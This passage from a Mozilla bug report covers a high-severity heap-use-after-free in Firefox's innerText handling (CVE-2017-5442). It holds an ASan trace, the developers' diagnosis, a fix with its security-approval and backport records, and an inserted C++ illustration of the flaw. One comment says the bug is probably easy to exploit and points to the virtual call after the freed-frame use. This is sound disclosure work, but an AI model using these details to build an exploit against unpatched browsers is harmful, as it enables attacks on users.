    #36 0x7f3178d6a4d6 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11064
    #37 0x7f3178d7e759 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4079:9
    #38 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #39 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #40 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #41 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #42 0x7f3178d6a4d6 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #43 0x7f3178d6a4d6 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11064
    #44 0x7f3178d7340b in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12081:3

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsIFrame.h:676:43 in GetContent
Shadow bytes around the buggy address:
  0x0c4a80071680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80071690: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c4a800716d0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800716f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80071700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80071710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80071720: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==7691==ABORTING
Group: core-security → dom-core-security
Keywords: csectype-uaf, sec-high
Matt, I wonder if this might be related to bug 1302071? Wild guess.
Flags: needinfo?(matt.woodrow)
status-firefox52: --- → ?
status-firefox53: --- → ?
status-firefox54: --- → ?
I don't think bug 1302071 is related, this looks like a classic layout crash.

It looks like nsRange::GetInnerTextNoFlush is calling ElementIsVisible, which results in a style flush and the entire PresShell being destroyed (destructor called when we exit nsComputedDOMStyle::GetStyleContextForElement and drop the nsCOMPtr ref).

We then attempt to continue using 'f', which was allocated within the PresShell's arena, and we crash.

What's not clear to me is why the style flush actually does anything, since the caller (nsGenericHTMLElement::GetInnerText) should have flushed Layout, which includes style.

Maybe the ruby causes problems?

Any ideas, Mats?
Component: DOM → Layout
Flags: needinfo?(matt.woodrow) → needinfo?(mats)
(Assignee)

Comment 3

2 years ago
Created attachment 8848269 [details]
stack for SetNeedStyleFlush

Right, it seems rather bad for a method with "NoFlush" in its name to call functions that may lead to a flush...  I don't think FlushPendingNotifications
gives any guarantees that flushing again is a NOP.

The call chain here is:
nsRange::GetInnerTextNoFlush
  ElementIsVisible
    nsComputedDOMStyle::GetStyleContextForElement
      presShell->FlushPendingNotifications(FlushType::Style)

I'm attaching the stack that requested the style flush.
Flags: needinfo?(mats)
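Added illustration, not part of this bug's comments or attachments and not Gecko code: the mechanism described in comments 2 and 3 (a method that promises not to flush calls ElementIsVisible, which reaches a style flush, which can destroy the PresShell and the frame arena while the caller still holds a raw frame pointer) reduced to a small C++ model. PresShell, Frame, WeakFrame, ElementIsVisible, WalkWithRawPointer and WalkWithWeakFrame are hypothetical stand-ins with constructed sample data; the weak-reference variant is one defensive pattern for this class of bug and is not the patch that landed here.

```cpp
// Added illustration (hypothetical types, not Gecko code): a "NoFlush" walk
// calls a helper that may flush style; the flush tears down the shell that
// owns the frames; the walk keeps a raw pointer into the freed arena.
#include <algorithm>
#include <cstdio>
#include <memory>
#include <string>
#include <vector>

// Stand-in for nsIFrame: owned by the shell's arena, handed out as a raw pointer.
struct Frame {
  std::string content;
};

// Stand-in for the PresShell and its frame arena. A style flush with pending
// work destroys the shell, the worst case described in comment 2.
struct PresShell {
  std::vector<std::unique_ptr<Frame>> arena;
  std::vector<Frame**> weakSlots;  // weak-reference slots cleared on teardown
  bool needStyleFlush = false;
  bool destroyed = false;

  explicit PresShell(bool pendingStyleWork) : needStyleFlush(pendingStyleWork) {
    arena.push_back(std::unique_ptr<Frame>(new Frame{"a"}));  // constructed sample frame
  }
  Frame* FirstFrame() { return arena.empty() ? nullptr : arena.front().get(); }

  // Models presShell->FlushPendingNotifications(FlushType::Style).
  void FlushPendingStyle() {
    if (!needStyleFlush || destroyed) return;
    needStyleFlush = false;
    for (Frame** slot : weakSlots) *slot = nullptr;  // invalidate weak refs first
    arena.clear();                                   // frames are freed here
    destroyed = true;
  }
};

// Hypothetical weak frame reference: the shell nulls it when the arena goes
// away, so the holder can tell a live frame from a dangling one.
class WeakFrame {
 public:
  WeakFrame(PresShell& shell, Frame* f) : shell_(shell), frame_(f) {
    shell_.weakSlots.push_back(&frame_);
  }
  ~WeakFrame() {
    std::vector<Frame**>& v = shell_.weakSlots;
    v.erase(std::remove(v.begin(), v.end(), &frame_), v.end());
  }
  WeakFrame(const WeakFrame&) = delete;
  WeakFrame& operator=(const WeakFrame&) = delete;
  bool IsAlive() const { return frame_ != nullptr; }
  Frame* Get() const { return frame_; }

 private:
  PresShell& shell_;
  Frame* frame_;
};

// Models ElementIsVisible -> nsComputedDOMStyle::GetStyleContextForElement,
// the step in the call chain of comment 3 that may flush.
bool ElementIsVisible(PresShell& shell) {
  shell.FlushPendingStyle();
  return !shell.destroyed;
}

// The pattern behind the crash: take a raw Frame*, run a helper that may
// flush, keep using the pointer. Returns true when the pointer is dangling at
// the point of use. This model only reports it; nsRange.cpp dereferenced it
// (f->GetContent()), which is the read ASAN flagged.
bool WalkWithRawPointer(PresShell& shell) {
  Frame* f = shell.FirstFrame();
  if (!f) return false;
  ElementIsVisible(shell);
  return shell.destroyed;  // if true, f points into a freed arena
}

// Defensive variant (an assumption of this example, not the fix on this bug):
// hold the frame through a weak reference and stop if the flush destroyed it.
bool WalkWithWeakFrame(PresShell& shell, std::string* textOut) {
  WeakFrame f(shell, shell.FirstFrame());
  if (!f.IsAlive()) return false;
  ElementIsVisible(shell);
  if (!f.IsAlive()) return false;  // arena torn down during the "NoFlush" walk
  *textOut = f.Get()->content;
  return true;
}

int main() {
  PresShell dirty(true);  // pending style work, as after SetNeedStyleFlush()
  std::printf("raw pointer dangling: %s\n", WalkWithRawPointer(dirty) ? "yes" : "no");
  PresShell dirty2(true);
  std::string text;
  std::printf("weak frame walk completed: %s\n", WalkWithWeakFrame(dirty2, &text) ? "yes" : "no");
  return 0;
}
```

WalkWithRawPointer reports that its pointer is dangling instead of dereferencing it, so the model runs cleanly; the read that nsRange.cpp performed at that point is what ASAN reported in comment 0. The primary remedy is the one comment 3 implies, namely that a "NoFlush" path must not call anything that can flush; the weak-frame check is a second line of defense for callers that cannot guarantee that contract.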
(Assignee)

Comment 4

2 years ago
Created attachment 8848275 [details] [diff] [review]
fix
Assignee: nobody → mats
Attachment #8848275 - Flags: review?(bugs)
Flags: sec-bounty?
(Assignee)

Comment 5

2 years ago
FTR, it looks like Boris added the SetNeedStyleFlush() call in
PresShell::ResizeReflowIgnoreOverride in bug 709256 part 3:
http://searchfox.org/mozilla-central/diff/ea35d340a7db4331568e09d2cb46555fceb162ef/layout/base/nsPresShell.cpp#2186
Severity: normal → critical
Flags: in-testsuite?
Keywords: crash, testcase
OS: Unspecified → All
Hardware: Unspecified → All
Attachment #8848275 - Flags: review?(bugs) → review+
(Assignee)

Comment 6

2 years ago
Comment on attachment 8848275 [details] [diff] [review]
fix

[Security approval request comment]
How easily could an exploit be constructed based on the patch?  

Probably not that hard to exploit once you find a testcase that crashes.
There's a virtual GetRenderedText() call just below the UAF crash in
comment 0:
3588            result.AddRequiredLineBreakCount(GetRequiredInnerTextLineBreakCount(f));
3589            if (isText) {
3590              nsIFrame::RenderedText text = f->GetRenderedText();


Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

The name of the changed method reveals that a DOM innerText function
is involved somehow.  It's probably not that hard to see that there
is some style change involved also.

Which older supported branches are affected by this flaw?

We added support for innerText in bug 264412, so probably all versions
since then, i.e. v45 or newer.

If not all supported branches, which bug introduced the flaw?

bug 264412, I suspect

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

Should be trivial to backport to all branches

How likely is this patch to cause regressions; how much testing does it need?

Very unlikely.  None.
Attachment #8848275 - Flags: sec-approval?
(Assignee)

Updated

2 years ago
Component: Layout → DOM: Core & HTML
status-firefox52: ? → affected
status-firefox53: ? → affected
status-firefox54: ? → affected
status-firefox-esr45: --- → affected
status-firefox-esr52: --- → affected
tracking-firefox52: --- → ?
tracking-firefox53: --- → ?
tracking-firefox54: --- → ?
tracking-firefox55: --- → ?
tracking-firefox-esr45: --- → ?
tracking-firefox-esr52: --- → ?
> FTR, it looks like Boris added the SetNeedStyleFlush() call in
> PresShell::ResizeReflowIgnoreOverride in bug 709256 part 3:

Just to be clear, before that our behavior was to always flush if someone asked for a flush (as in, as if SetNeedStyleFlush() had been called at all times)...

That said, that stack looks moderately fishy to me, in the sense that we're in the middle of a flush and shouldn't really need to SetNeedStyleFlush() there.  I'm not sure what a clean way to avoid it is, though, and a stray SetNeedStyleFlush is really mostly a performance problem.
sec-approval+ for trunk.
We'll want patches made and nominated for all affected branches including both ESR branches.
status-firefox52: affected → wontfix
tracking-firefox52: ? → ---
tracking-firefox53: ? → +
tracking-firefox54: ? → +
tracking-firefox55: ? → +
tracking-firefox-esr45: ? → 53+
tracking-firefox-esr52: ? → 53+
Attachment #8848275 - Flags: sec-approval? → sec-approval+
https://hg.mozilla.org/mozilla-central/rev/145f874ee97afa9d1ee5ed1a47accda22adc5707
Status: NEW → RESOLVED
Last Resolved: 2 years ago
status-firefox55: affected → fixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla55
(Assignee)

Comment 11

2 years ago
Comment on attachment 8848275 [details] [diff] [review]
fix

Approval Request Comment
[Feature/Bug causing the regression]: bug 264412, I suspect
[User impact if declined]: UAF crash
[Is this code covered by automated tests?]: yes
[Has the fix been verified in Nightly?]: no
[Needs manual test from QE? If yes, steps to reproduce]: no
[List of other uplifts needed for the feature/fix]:
[Is the change risky?]: no
[Why is the change risky/not risky?]: trivial fix
[String changes made/needed]: none
Attachment #8848275 - Flags: approval-mozilla-esr52?
Attachment #8848275 - Flags: approval-mozilla-esr45?
Attachment #8848275 - Flags: approval-mozilla-beta?
Attachment #8848275 - Flags: approval-mozilla-aurora?
Flags: sec-bounty? → sec-bounty+
Comment on attachment 8848275 [details] [diff] [review]
fix

Fix a sec-high. Aurora54+ & Beta53+.
Attachment #8848275 - Flags: approval-mozilla-beta?
Attachment #8848275 - Flags: approval-mozilla-beta+
Attachment #8848275 - Flags: approval-mozilla-aurora?
Attachment #8848275 - Flags: approval-mozilla-aurora+

Comment 14

2 years ago
uplift
https://hg.mozilla.org/releases/mozilla-beta/rev/b2be2b8f74bb
status-firefox53: affected → fixed
Comment on attachment 8848275 [details] [diff] [review]
fix

sec-high uaf fix for esr45.9 and esr52.1
Attachment #8848275 - Flags: approval-mozilla-esr52?
Attachment #8848275 - Flags: approval-mozilla-esr52+
Attachment #8848275 - Flags: approval-mozilla-esr45?
Attachment #8848275 - Flags: approval-mozilla-esr45+

Comment 16

2 years ago
uplift
https://hg.mozilla.org/releases/mozilla-esr52/rev/5f1aa2336998
https://hg.mozilla.org/releases/mozilla-esr45/rev/4ae2261bfab0
status-firefox-esr45: affected → fixed
status-firefox-esr52: affected → fixed
Group: dom-core-security → core-security-release
Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+]
Alias: CVE-2017-5442
Setting qe-verify- based on Mats' assessment on manual testing needs and the fact that this fix has automated coverage (see Comment 11).
Flags: qe-verify-
Group: core-security-release